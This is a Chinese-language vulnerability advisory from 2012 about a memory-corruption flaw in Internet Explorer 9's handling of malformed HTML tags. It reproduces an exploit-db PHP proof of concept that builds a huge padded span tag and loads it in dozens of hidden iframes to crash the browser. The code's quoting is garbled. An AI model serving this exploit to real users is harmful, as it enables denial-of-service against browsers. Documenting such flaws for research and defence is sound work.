发布日期:2012-11-01
更新日期:2012-11-08受影响系统:
Microsoft Internet Explorer 9.x
描述:
--------------------------------------------------------------------------------
Microsoft Internet Explorer是微软公司推出的一款网页浏览器,使用相当广泛。
IE9在处理畸形HTML标签数据时存在安全漏洞,远程攻击者可能利用此漏洞导致内存破坏,应用崩溃。
<*来源:Jean Pascal Pereira
链接:http://www.exploit-db.com/exploits/22401/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
set_time_limit(0); ini_set("memory_limit", "300M"); if(!file_exists("junk.htm"))
{
$string = "<span id="";
for($i = 0; $i < 24117256; $i++)
{
$string .= "x90";
}
$string .= ""></span>";
file_put_contents("junk.htm", $string);
} print "View the sourcecode of the iframe below (right click -> view source): <br />
";
print "<iframe style="width: 800px; height: 500px;" src="junk.htm">
"; for($i = 0; $i < 60; $i++)
{
print "<iframe style="display:none" src="junk.htm">
";
} /* http://0xffe4.org */ ?>建议:
--------------------------------------------------------------------------------
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp多个IBM WebSphere产品安全限制绕过漏洞Google Chrome 23.0.1271.64之前版本多个安全漏洞相关资讯 内存破坏漏洞 IE9安全漏洞 IE9
Gmail 等 Google 服务不再兼容 IE9 (11/07/2013 09:56:18) Adobe Flash Player和AIR远程内存 (12/14/2012 08:27:54) Real Networks RealPlayer ".3g2" (11/04/2012 08:07:40) Nuance PDF Read和PDF Viewer Plus (03/01/2013 21:03:44) 多个Symantec产品CAB文件处理内存 (11/07/2012 06:21:19) libunity-webapps释放后重用内存破 (10/31/2012 08:40:51)
本文评论 查看全部评论 (0)
尊重网上道德,遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即表明您已经阅读并接受上述条款
收藏该网址
易网时代-编程资源站